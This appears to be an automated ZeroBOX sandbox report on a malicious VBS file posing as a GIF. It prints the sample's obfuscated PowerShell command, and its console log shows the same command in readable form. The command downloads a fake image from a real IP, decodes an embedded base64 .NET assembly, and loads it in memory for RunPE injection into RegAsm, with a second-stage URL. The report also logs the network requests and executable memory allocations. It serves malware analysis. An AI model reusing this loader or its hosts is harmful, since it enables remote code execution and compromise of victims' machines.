popup
Summary | ZeroBOX
  1. Home
  2. Result
  3. Report
  4. Detail Analysis

profilegoodforinvestreturntogold.gif.vbs

Generic Malware Antivirus Hide_URL PowerShell
  1. Resubmit sample
Category Machine Started Completed
FILE s1_win7_x6402 July 4, 2024, 4:56 p.m. July 4, 2024, 4:58 p.m.
Size 3.4KB
Type Little-endian UTF-16 Unicode text, with CRLF, CR line terminators
MD5 a93733bf3912d34ee7074f64f2d93156
SHA256 5f5510b1666a37ca20e98010d916ba1c73eee63fcd386abcc413952cfdd7d1f5
CRC32 45788B0B
ssdeep 96:fXzAm0boMXzAZ+XzA2fMXzAxXzA/0bo8XzAyfB9UBbBb40bo+B9XzAZX:fDZMD7DTMD6DI8DXf7UNd6+bDi
Yara None matched

  • wscript.exe "C:\Windows\System32\wscript.exe" C:\Users\test22\AppData\Local\Temp\profilegoodforinvestreturntogold.gif.vbs

    3044

    • powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Command "(('0mjlink = vbAhttp://91.92.254.194/imge'+'/new-image_v.jpgvbA; 0mjwebClient = New-Object System.Net.WebClient; try {'+' 0mjdownloadedData ='+' 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host vbAFailed To download data from 0mjlinkvbA -Foreg'+'roundColor Red; exit }; if (0mjdownloadedData -ne 0mjnull)'+' { 0mjimageText = [Syst'+'em.Text.Encoding]::UTF8.GetString(0mjdow'+'nloa'+'dedDat'+'a); 0mjstartFlag = vbA<<BASE64_S'+'TART>>vbA; 0mjendFlag = vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mjimageText.'+'IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimage'+'Text.IndexOf(0mjendFlag); if (0mjstartIndex -ge 0 -and 0mjendIndex -gt 0mjstartIndex) { 0mjstartInd'+'ex += '+'0mjstartFlag.Length; 0mjbase64Length = 0mjendIn'+'de'+'x - 0m'+'jstartIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstart'+'Index, 0mjbase64Length); 0mjcommandBytes = [System.'+'Convert]::FromBase64String(0mjbase64Command); '+'0mjloadedAs'+'sembly ='+' [System.Reflection.Assembly]::'+'Load(0mjcommandBytes); 0mjtype = 0mjloadedAssembly.GetType(vbARunPE'+'.Homev'+'bA); 0mjmethod = 0mjtype.GetMethod('+'vbAVAIvbA).Invoke(0mjnull,'+' [obj'+'ect[]] (vbAtxt.HGU/990'+'55/61'+'.532.59'+'.32//:ptthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAdesativadovbA,'+'vbARegAsm'+'vbA,vbAvbA)) } }Set Scriptblock 0mjlink '+'= vbAh'+'ttp://91.92'+'.254.194/imge/new-image_v.jp'+'gvbA; 0mjwebClient'+' = New-Object System.Net.WebClient; try { 0mjdownloadedData = 0mjwebClient.DownloadData(0mjlink) } catch { Write-Host'+' vbAFailed To download data'+' from 0mjlinkvbA -ForegroundColor Red; exit }; '+'if (0mjdo'+'wnloadedData -ne'+' 0mjnull) { 0mjimageText = [System.Text.Encoding]::UTF8.G'+'etString(0mj'+'downloadedDat'+'a); 0mjstartFla'+'g = vbA<<BASE64_START>>vbA'+'; 0mjendF'+'lag '+'= vbA<<BASE64_END>>vbA; 0mjstartIndex = 0mji'+'mageText.IndexOf(0mjstartFlag); 0mjendIn'+'dex = 0mjimageText.IndexOf(0mjendFlag); if (0mjstartIndex -'+'ge 0 -and 0m'+'jendInde'+'x -gt '+'0mjstartIndex) { 0mjstartIndex += 0mjstartFlag.Length; 0mjbase64Length = 0'+'mjendIn'+'dex - 0mjstar'+'tIndex; 0mjbase64Command = 0mjimageText.Substring(0mjstartIndex, 0mjbase64Length); 0mjcommandBytes = [System.C'+'onvert]::FromBase64String(0mjbase64Command); 0mjloadedA'+'ssembly = [System.Reflection.Assembly]::Load(0mjcommandBytes);'+' 0mjtype = 0mjloadedAssembly.GetType(vbARunPE.HomevbA); 0'+'mjmethod = 0mjtype.GetMethod(vbAVAIvbA).Invoke(0mjnu'+'ll, [o'+'bject[]] (vbAtxt.HGU/99055/61.53'+'2.59.32//:p'+'tthvbA , vbAdesativadovbA , vbAdesativadovbA , vbAde'+'sativadovbA,v'+'bARegAsmvbA,vbAvbA)) } }')-rePLAcE'0mj',[cHAr]36 -rePLAcE ([cHAr]118+[cHAr]98+[cHAr]65),[cHAr]39) |& ( $pshoME[4]+$pSHOmE[34]+'X')"

      2292

Name Response Post-Analysis Lookup
No hosts contacted.
IP Address Status Action
164.124.101.2 Active Moloch
91.92.254.14 Active Moloch
91.92.254.194 Active Moloch

Time & API Arguments Status Return Repeated

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameA

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0

GetComputerNameW

 computer_name: TEST22-PC
1 1 0
Time & API Arguments Status Return Repeated

IsDebuggerPresent

 0 0
Time & API Arguments Status Return Repeated

WriteConsoleW

 buffer: Exception calling "Invoke" with "2" argument(s): "The requested security protoc
console_handle: 0x00000023
1 1 0

WriteConsoleW

 buffer: ol is not supported."
console_handle: 0x0000002f
1 1 0

WriteConsoleW

 buffer: At line:1 char:917
console_handle: 0x0000003b
1 1 0

WriteConsoleW

 buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x00000047
1 1 0

WriteConsoleW

 buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x00000053
1 1 0

WriteConsoleW

 buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x0000005f
1 1 0

WriteConsoleW

 buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x0000006b
1 1 0

WriteConsoleW

 buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x00000077
1 1 0

WriteConsoleW

 buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000083
1 1 0

WriteConsoleW

 buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x0000008f
1 1 0

WriteConsoleW

 buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000009b
1 1 0

WriteConsoleW

 buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x000000a7
1 1 0

WriteConsoleW

 buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x000000b3
1 1 0

WriteConsoleW

 buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x000000bf
1 1 0

WriteConsoleW

 buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke <<<< ($null, [object[]] ('txt
console_handle: 0x000000cb
1 1 0

WriteConsoleW

 buffer: .HGU/99055/61.532.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','R
console_handle: 0x000000d7
1 1 0

WriteConsoleW

 buffer: egAsm','')) } }Set Scriptblock $link = 'http://91.92.254.194/imge/new-image_v.j
console_handle: 0x000000e3
1 1 0

WriteConsoleW

 buffer: pg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $web
console_handle: 0x000000ef
1 1 0

WriteConsoleW

 buffer: Client.DownloadData($link) } catch { Write-Host 'Failed To download data from $
console_handle: 0x000000fb
1 1 0

WriteConsoleW

 buffer: link' -ForegroundColor Red; exit }; if ($downloadedData -ne $null) { $imageText
console_handle: 0x00000107
1 1 0

WriteConsoleW

 buffer: = [System.Text.Encoding]::UTF8.GetString($downloadedData); $startFlag = '<<BAS
console_handle: 0x00000113
1 1 0

WriteConsoleW

 buffer: E64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($st
console_handle: 0x0000011f
1 1 0

WriteConsoleW

 buffer: artFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and
console_handle: 0x0000012b
1 1 0

WriteConsoleW

 buffer: $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length =
console_handle: 0x00000137
1 1 0

WriteConsoleW

 buffer: $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $ba
console_handle: 0x00000143
1 1 0

WriteConsoleW

 buffer: se64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command)
console_handle: 0x0000014f
1 1 0

WriteConsoleW

 buffer: ; $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type =
console_handle: 0x0000015b
1 1 0

WriteConsoleW

 buffer: $loadedAssembly.GetType('RunPE.Home'); $method = $type.GetMethod('VAI').Invoke(
console_handle: 0x00000167
1 1 0

WriteConsoleW

 buffer: $null, [object[]] ('txt.HGU/99055/61.532.59.32//:ptth' , 'desativado' , 'desati
console_handle: 0x00000173
1 1 0

WriteConsoleW

 buffer: vado' , 'desativado','RegAsm','')) } }
console_handle: 0x0000017f
1 1 0

WriteConsoleW

 buffer: + CategoryInfo : NotSpecified: (:) [], MethodInvocationException
console_handle: 0x0000018b
1 1 0

WriteConsoleW

 buffer: + FullyQualifiedErrorId : DotNetMethodTargetInvocation
console_handle: 0x00000197
1 1 0

WriteConsoleW

 buffer: Set-Variable : A positional parameter cannot be found that accepts argument '='
console_handle: 0x000001b7
1 1 0

WriteConsoleW

 buffer: At line:1 char:1038
console_handle: 0x000001cf
1 1 0

WriteConsoleW

 buffer: + $link = 'http://91.92.254.194/imge/new-image_v.jpg'; $webClient = New-Object
console_handle: 0x000001db
1 1 0

WriteConsoleW

 buffer: System.Net.WebClient; try { $downloadedData = $webClient.DownloadData($link) }
console_handle: 0x000001e7
1 1 0

WriteConsoleW

 buffer: catch { Write-Host 'Failed To download data from $link' -ForegroundColor Red; e
console_handle: 0x000001f3
1 1 0

WriteConsoleW

 buffer: xit }; if ($downloadedData -ne $null) { $imageText = [System.Text.Encoding]::UT
console_handle: 0x000001ff
1 1 0

WriteConsoleW

 buffer: F8.GetString($downloadedData); $startFlag = '<<BASE64_START>>'; $endFlag = '<<B
console_handle: 0x0000020b
1 1 0

WriteConsoleW

 buffer: ASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageT
console_handle: 0x00000217
1 1 0

WriteConsoleW

 buffer: ext.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) {
console_handle: 0x00000223
1 1 0

WriteConsoleW

 buffer: $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $bas
console_handle: 0x0000022f
1 1 0

WriteConsoleW

 buffer: e64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes =
console_handle: 0x0000023b
1 1 0

WriteConsoleW

 buffer: [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.R
console_handle: 0x00000247
1 1 0

WriteConsoleW

 buffer: eflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('RunP
console_handle: 0x00000253
1 1 0

WriteConsoleW

 buffer: E.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.HGU/9
console_handle: 0x0000025f
1 1 0

WriteConsoleW

 buffer: 9055/61.532.59.32//:ptth' , 'desativado' , 'desativado' , 'desativado','RegAsm'
console_handle: 0x0000026b
1 1 0

WriteConsoleW

 buffer: ,'')) } }Set <<<< Scriptblock $link = 'http://91.92.254.194/imge/new-image_v.j
console_handle: 0x00000277
1 1 0

WriteConsoleW

 buffer: pg'; $webClient = New-Object System.Net.WebClient; try { $downloadedData = $web
console_handle: 0x00000283
1 1 0

WriteConsoleW

 buffer: Client.DownloadData($link) } catch { Write-Host 'Failed To download data from $
console_handle: 0x0000028f
1 1 0
Time & API Arguments Status Return Repeated

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d350
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031db10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031db10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031db10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031da10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d410
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d610
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d5d0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031dd10
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031cfd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031cfd0
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0

CryptExportKey

 buffer: <INVALID POINTER>
crypto_handle: 0x0031d990
flags: 0
crypto_export_handle: 0x00000000
blob_type: 6
1 1 0
Time & API Arguments Status Return Repeated

GlobalMemoryStatusEx

 1 1 0
suspicious_features Connection to IP address suspicious_request GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt
suspicious_features GET method with no useragent header, Connection to IP address suspicious_request GET http://91.92.254.194/imge/new-image_v.jpg
request GET http://91.92.254.14/Users_API/syscore/file_fdncluho.ggk.txt
request GET http://91.92.254.194/imge/new-image_v.jpg
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 1638400
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02920000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a70000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fa000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

 process_identifier: 2292
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 8192
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x722d2000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021f2000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02202000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a71000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a72000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0222a000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02203000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02204000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223b000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02237000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x021fb000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02222000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02235000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02205000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0222c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02a60000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02206000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0223c000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02223000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02224000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02225000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02226000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02227000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02228000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02229000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05100000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05101000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05102000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05103000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05104000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

 process_identifier: 2292
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05105000
